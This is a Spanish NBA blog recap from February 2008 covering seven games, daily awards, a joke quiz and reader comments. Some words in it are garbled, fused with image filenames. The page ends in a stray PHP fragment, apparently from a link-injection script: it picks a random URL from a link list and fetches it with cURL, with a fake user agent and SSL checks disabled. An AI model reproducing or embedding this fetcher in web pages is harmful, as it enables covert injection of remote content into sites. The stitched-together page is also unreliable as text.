La crónica (11/02/08)

12 de February de 2008 por MagicJohnson32

La jornada de hoy nos ha dejado 7 partidos en los que hemos visto cómo la pareja Kobe-Gasol funciona bien en ataque pero los Lakers siguen dejando dudas en defensa. También hemos visto que Dallas sigue teniendo muchos problemas fuera de casa y que Cleveland no es sólo LeBron James, al menos hoy. La noche nos ha dejado un gran partido entre Spurs y Toronto que los de San Antonio han ganado con autoridad pese al gran partido de Calderón, y un Portland – Houston en el que queda claro que los Trail Blazers van para abajo mientras que los Rockets despegan.

Y vamos ya con la crónica de la jornada

Lo de los Sixers lograron ante los Mavs su cuarto triunfo consecutivo, 76-84, y se sitúan a 0.5 partidos de la octava posición. Fue de la mano de un Andre Miller que celebró con otra gran actuación su elección como Jugador de la Semana en el Este. Los Mavs, con algunas bajas, tuvieron una segunda parte desastrosa en la que sólo anotaron 23 puntos. Además, Josh Howard y Nowitzki acusaron diversos problemas físicos que podría llevarlos a ser baja enkobeassistback próximos partidos. En Toronto, Calderón no pudo con Ginóbili y Duncan. Estos tres jugadores protagonizaron casi todo lo positivo del partido, que cayó del lado texano 93-88. La pobre aportación de Bosh y Bargnani (6 de 22 en tiros entre ambos) fue demasiado lastre para los Raptors pese al 12 de 17 en tiros con 6 asistencias de José Manuel Calderón. Ginóbili firmó por su parte cifras espectaculares: 34 puntos, 15 rebotes y 6 asistencias.

Larry Hughes se disfrazó de LeBron James y anotó 40 puntos con 12 de 19 en tiros de campo y 12 de 13 en libres ante Orlando Magic, en los que Turkoglu volvió a brillar pero Dwight Howard fue acusado de falta de concentración y de trabajo defensivo. Los Cavs se impusieron 118-111 gracias a los 69 puntos, 13 rebotes, 13 asistencias y 5 robos que lograron entre James y Hughes, quien anotó 23 puntos en el tercer periodo.

Los Lakers ampliaron su buena línea en la gira consecutiva más larga de la historia de la franquicia y que anoche les llevó a Charlotte. Bryant y Gasol brillaron en ataque con 31 y 26 puntos respectivamente aunque, igual que la noche anterior en Miami, los Lakers estuvieron cerca de perder una amplia stephenjacksonwizardsrenta en el último cuarto. Los Bobcats, con Felton y Mohammed como jugadores más destacados, se situaron a 3 puntos ya en el tramo final pero los Lakers reaccionaron a tiempo para vencer 106-97 y poner su balance en 34-17. También venció a domicilio el otro equipo angelino, los Clippers, que cerraron su particular gira de 7 partidos con un triunfo por 96-89 en Milwaukee liderados por Al Thornton, Cassell y Maggette. En los Bucks el mejor fue Mo Williams, pero el 7 de 29 en tiros que sumaron Redd y Bogut no ayudaron a evitar lo que supone su tercera derrota seguida.

Les ha costado pero los Rockets parecen haber despegado. Anoche vencieron a los Blazers 83-95, suman 7 victorias seguidas (11 de los últimos 12) y ya rozan los Playoffs. Yao y Alston lideraron la victoria de los texanos sobre unos Blazers que empiezan a desinflarse y ven alejarse las plazas de Playoffs a 3 partidos. Por último, los Warriors obtuvieron una victoria dramática ante los Wizards tras remontarles 23 puntos de la mano de Stephen Jackson, autor de 41. Ellis, Harrington y Davis lograron más de 19 cada uno, mientras que los capitalinos, de nuevo sin Arenas, Butler y Daniels, encajaron de este modo su octava derrota seguida. Roger Mason logró su máximo como profesional con 32 puntos, mientras Jamison y Haywood alcanzaron la veintena de puntos y los 10 rebotes cada uno.

Tras la crónica, y como siempre, seguimos con los premios del día.larryhughesmagic

Nuestro MVP: El de hoy es un MVP sorpresa. Larry Hughes ha recordado por momentos al brillante jugador de los Wizards y ha completado un gran partido con 40 puntos y 6 rebotes. Otras actuaciones destacadas han sido los 41 puntos de Stephen Jackson, los 29 puntos, 10 asistencias y 7 rebotes de Lebron James, los 34 puntos, 15 rebotes de Manu Ginóbili y los 21 puntos, 8 rebotes y 7 asistencias de Andre Miller.

El rookie: Se confirma la calidad de Al Thorton, que se ha hecho finalmente con un hueco en el quinteto titular de Los Angeles Clippers y que de tanto en tanto se marca un partido interesante. 25 puntos anoche para él.

La sorpresa: Buen partido de Nazr Mohammed en ausencia de Gerald Wallace con 22 puntos y 11 rebotes (se confirma que Gasol tendrá que aplicarse en defensa). Pero más sorprendente si cabe es el partido de Roger Mason, de los Wizards, con 32 puntos y 6 asistencias aprovechando las bajas de Gilbert Arenas y Antonio Daniels.

La decepción: Mal partido en general de Toronto y en particular de su teórico líder, Chris Bosh. El de Georgia Tech ha acabado el partido con 11 puntos y 8 rebotes, y tuvo que ser Calderón el que llevara todo el peso ofensivo del equipo.

Y ahora, nuestro pasatiempo diario: ¿Qué puede estar pasando por la cabeza de Avery Johnson?

Avery Johnson pensando A) “¿Cómo podemos jugar tan mal fuera de casa?”

B) “El carroza de Miller casi se marca un triple doble y nosotros sin base…”

C) “Nowitzki, 4 de 15 en tiro ante esta banda, vamos apañados.”

D) “¿Me venderá alguien una máquina del tiempo para volver al año pasado? Creo que ya sé cómo ganarle a Nelson.”

E) “Vaya Playoffs nos esperan…”

F) “Kobe + Gasol + Bynum, Nash + Amare + O’Neal. Casi mejor dimito ahora y me ahorro el mal trago.”

Solución: Cualquiera excepto la D, ya que en ningún caso Avery Johnson sabe cómo ganarle la partida al perro viejo de Don Nelson. El entrenador de los Mavericks todavía se debe de estar preguntando cómo han perdido el partido de hoy así que seguramente la respuesta correcta sería la A. Para los ganadores de hoy tenemos el DVD con los partidos de la primera ronda de Playoffs del año pasado entre Dallas y Golden State en los que seguro que la cara de la foto se repitió muchas veces.

Os dejamos con las 10 mejores jugadas de la jornada:

Comenta

3 comentarios a esta entrada

  1. Garci dice:
    #1

    Otro partidazo de Calderon, esta vez, se ha lucido anotando. La pena es que no este en el all star.
    En el caso de Gasol y de los lakers, otro buen partido de kobe (ya nos tiene acostumbrado), y un muy buen partido de Gasol.
    Yo opino que la respuesta adecuada es la F, aunque lo de nash, Amare vale, pero lo de O’neill (esta viejete) y ya no esta fisicamente como antes, pero bueno, algun partido bueno ya hara.

      Citar

  2. txusma dice:
    #2

    El rendimiento de O’Neal en los Suns creo q es la gran incognita de lo que queda de temporada.

      Citar

  3. xapa_croack dice:
    #3

    cuando debuta diesel donuts?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>